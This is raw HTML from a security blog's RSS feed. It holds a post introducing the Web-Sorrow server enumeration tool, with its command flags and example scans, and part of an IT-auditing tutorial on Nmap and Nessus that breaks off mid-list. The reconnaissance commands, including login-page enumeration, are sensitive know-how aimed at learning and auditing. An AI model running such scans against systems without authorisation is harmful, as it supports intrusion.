&lt;a href="http://feedads.g.doubleclick.net/~a/AL7ldCe-88IxYyhevhLBRs5U8A4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/AL7ldCe-88IxYyhevhLBRs5U8A4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/04/web-sorrow-web-server-scanner.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-eTmYs-sBwHI/T4g7da7uDAI/AAAAAAAABGw/9DZqm07bPNM/s200/Web-Sorrow_Logo.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Automatic scanning has worth, automatic scanner save time and can do work efficiently. There are various automatic tools are available on public some for web application vulnerability scanning and for network or system level scanning. &lt;a href="http://www.ehacking.net/2011/04/nikto-vulnerability-scanner-tutorial.html" style="color: blue;" target="_blank"&gt;Nikto&lt;/a&gt; is a wonderful open source tool to analyze a web server for misconfiguration and for the common &lt;a href="http://www.ehacking.net/search/label/Vulnerability" style="color: blue;" target="_blank"&gt;vulnerability&lt;/a&gt; but Nikto is not a single player in information security and penetration testing, there is another a tool called Web-Sorrow. &amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;web-sorrow is a perl based tool used for checking a Web server for misconfiguration,  version detection,  enumeration, and server information. what is's NOT:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="font-family: inherit; text-align: left;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Vulnerably scanner&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Inspection proxy&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;DDoS tool&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Exploitation framework&amp;nbsp; &lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;usage:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;-host [host] -- Defines host to scan.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-proxy [ip:port] -- use a proxy server&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-S -- Standard misconfig and other checks&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-Eb -- Error Begging. Sometimes a 404 page contains server info such as daemon or even the OS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-auth -- Dictionary attack to find login pages (not passwords)&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-cmsPlugins [dp | jm | wp | all] -- check for cms plugins. dp = drupal, jm = joomla, wp = wordpress (db's a bit outdated 2010)&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-I -- Find interesting strings in pages (very verbose)&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-Fd -- look for common interesting files and dirs&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-Ws -- look for Web Services on host. such as hosting porvider, blogging service, favicon fingerprinting, and cms version info&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &amp;nbsp;-e -- everything. run all scans&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-JylqwV5Xvs0/T4g8A06EiVI/AAAAAAAABG4/L-WI2d4t9uY/s1600/websorrow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="324" src="http://1.bp.blogspot.com/-JylqwV5Xvs0/T4g8A06EiVI/AAAAAAAABG4/L-WI2d4t9uY/s640/websorrow.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;h3 style="color: blue; font-family: inherit; text-align: left;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;EXAMPLES: &lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;basic: perl Wsorrow.pl -host scanme.nmap.org -S &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;look for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-8557141759079434616?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Z8OmkigTfNo:EFiCaVkTSUQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Z8OmkigTfNo:EFiCaVkTSUQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Z8OmkigTfNo:EFiCaVkTSUQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=Z8OmkigTfNo:EFiCaVkTSUQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=Z8OmkigTfNo:EFiCaVkTSUQ:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/Z8OmkigTfNo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/Z8OmkigTfNo/web-sorrow-web-server-scanner.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-eTmYs-sBwHI/T4g7da7uDAI/AAAAAAAABGw/9DZqm07bPNM/s72-c/Web-Sorrow_Logo.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/04/web-sorrow-web-server-scanner.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-2150252862171803396</guid><pubDate>Wed, 04 Apr 2012 17:43:00 +0000</pubDate><atom:updated>2012-04-04T10:44:04.130-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Infosec</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><title>IT Auditing Fundamentals – Theoretical to Practical</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QRB3VrVqsUUU6pVkkFnNeVEfRRY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QRB3VrVqsUUU6pVkkFnNeVEfRRY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QRB3VrVqsUUU6pVkkFnNeVEfRRY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QRB3VrVqsUUU6pVkkFnNeVEfRRY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/04/it-auditing-fundamentals-theoretical-to.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-hQSU662I794/T3yH4F60oLI/AAAAAAAABGY/MClAKA6i64g/s200/assurance-and-audit.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Information security is a vast field and has a broad interest there 
are so many penetration tester and &lt;a href="http://www.infosecinstitute.com/courses/ethical_hacking_training.html" rel="" style="color: blue;" target="_blank"&gt;ethical hacker&lt;/a&gt; out there that 
provides there services for network and web application testing. IT 
auditing is an essential part of today networks, network can be a small 
(LAN) and a big both are requires auditing.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;IT auditing is not directly 
reflect the image of penetration testing and vulnerability assessment 
because there are multiple types of audit, its all depend on the 
objectives and the goals. An organization uses IT auditing to control 
the flow of information, to find the network weaknesses, policies, 
backup procedure, patching and to ensure the protection of users and 
customer information, well as said earlier its all depend on the goal.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Generally
 IT audit means to find the hardware’s and software’s that are 
associated with the network, like IT auditing can be used to track&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit; margin-left: 45pt;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Partition&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Sound cards, Videos cards, LAN cards and other&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;System component&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Installed software’s (including OS)&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Security setting&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;A quick example of an IT audit result can be see in this picture.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-xKtf5zESvEM/T3sVmGaS8eI/AAAAAAAABFw/3UJ-Ur761Cw/s1600/figure+1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="361" src="http://1.bp.blogspot.com/-xKtf5zESvEM/T3sVmGaS8eI/AAAAAAAABFw/3UJ-Ur761Cw/s400/figure+1.jpg" width="450" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h2 style="color: blue; font-family: inherit; text-align: center;"&gt;




&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;b&gt;Auditing Network Security&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;As
 the security is an important part of IT audit so how an auditor can 
perform network security test, information gathering is the first step 
of it, gather maximum information about the network.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;What actually a network is?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;What is the network topology?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;How many devices are associated with the network?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;How many hosts are alive?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;What are the weaknesses of the network?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Which operating system are used on most of the host?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Is patch management work?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;How to break network security?&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;How to exploit a host? To gain the access on the network.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;So
 these are the main question of network security auditing and an auditor
 supposed to give the detail answer of these questions.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Tools are 
the essential component of any test including network security auditing,
 there are both open source and commercial tools are available for this 
purpose. Nmap, Openaudit and nessus are the best tools for this purpose.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Network
 mapper (Nmap) the best tool for multiple purposes, basically it is a 
network scanner and a port scanner utility but in this tutorial we will 
use it for auditing network security. Zenmap is a GUI of nmap, while 
nmap is a command line tool.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Let start with the first phase, what 
is a network ? Network topology, number of host, alive host, open ports,
 services and others can be find by using nmap.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-3YTF5wgvM08/T3sWBlCCoNI/AAAAAAAABF4/r7wXm6uhkIk/s1600/figure+2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="306" src="http://3.bp.blogspot.com/-3YTF5wgvM08/T3sWBlCCoNI/AAAAAAAABF4/r7wXm6uhkIk/s640/figure+2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;On the target box enter the IP of the target but for auditing case I 
want to scan the whole network that is why I have used class C IP 
subnet. &lt;span style="color: blue;"&gt;Intense scan&lt;/span&gt; is a famous and 
it gives you the complete picture of the network while if you want just 
ping than you can do this and if you want nmap to scan a specific port &lt;span style="color: blue;"&gt;Intense scan, all TCP ports &lt;span style="color: black;"&gt;and than define the range of the ports.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-pZfg1bMSvJI/T3sWKKU5tuI/AAAAAAAABGA/vykodnXJ_Mg/s1600/figure+3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="276" src="http://3.bp.blogspot.com/-pZfg1bMSvJI/T3sWKKU5tuI/AAAAAAAABGA/vykodnXJ_Mg/s640/figure+3.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;By looking the result you can realize the alive host and the open ports even we can find the topology look at the picture below.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-7lJh3LKjMqU/T3sWVG1c6pI/AAAAAAAABGI/5GHZhCsFS1s/s1600/figure+4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="366" src="http://3.bp.blogspot.com/-7lJh3LKjMqU/T3sWVG1c6pI/AAAAAAAABGI/5GHZhCsFS1s/s640/figure+4.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;The important picture that give you all the 
information about any host including the operating system, IP address, 
MAC address, open ports, operating system class, up time, last boot time
 and many more.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-r0pAG3akCZg/T3sWc4No1wI/AAAAAAAABGQ/qDIZjl0q_Eg/s1600/figure+5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="458" src="http://2.bp.blogspot.com/-r0pAG3akCZg/T3sWc4No1wI/AAAAAAAABGQ/qDIZjl0q_Eg/s640/figure+5.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;So after this quick scan an auditor has 
so many information about a network and in my views the more information
 more the chance of the success. Now the next step would be to find the 
weaknesses (vulnerabilities) that cause a network to exploit.&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style="font-family: inherit; text-align: center;"&gt;




&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue; font-size: large;"&gt;&lt;b&gt;Vulnerability Assessment&lt;/b&gt;&lt;/span&gt;&lt;span style="color: blue; text-decoration: underline;"&gt;&lt;b&gt;&lt;br /&gt; &lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;This
 is another an important step for network security auditing, 
vulnerabilities assessment is a process to find the vulnerability on a 
system and a network. There are different kind of vulnerability can be 
find on a system like the high risk vulnerability and low risk 
vulnerability. Usually the high risk vulnerabilities like :&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Buffer overflow&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Default password&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Known back-doors&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Poor/mis configuration&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Out dated software’s&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;If
 we see as a hacker/attacker perspective than these vulnerabilities can 
cause a network to be compromise so a network security auditor is 
responsible to find the vulnerabilities and suggest something (technical
 stuffs) to fix the vulnerabilities.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;There
 are different vulnerability scanners are available on both open source 
and commercial platform but make sure there are some vulnerability 
scanner for web application but in this article our focus is network 
vulnerability scanner. Nessus, OpenVAS and Retina vulnerability scanner 
and management are the wonderful tools for this purpose, before going to
 the practical aspect I want to introduce false positive 
result/response.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;False positive&lt;span style="color: black;"&gt;
 means an incorrect result, a software may find a vulnerability that you
 want it to find, if you think that false positive response is not a 
matter than you are wrong it takes your time. Keep in mind about false 
positive result before deciding a software for vulnerabilities 
assessment.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;&lt;span style="color: black;"&gt;&lt;br /&gt; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;In this
 article we will discuss Nessus and we will use Nessus as a 
vulnerabilities scanner and assessment tool, nessus is a very power tool
 that can used for multiple purposes from network vulnerabilities 
scanning to web vulnerability scanning, it can be used for:&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Vulnerability scanning&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Vulnerability management&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Configuration auditing&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Log management&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Network discovery&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Now why nessus and what nessus can do for us, if we are discussing about passive scanning than is a tool to find:&lt;br /&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="font-family: inherit;"&gt;
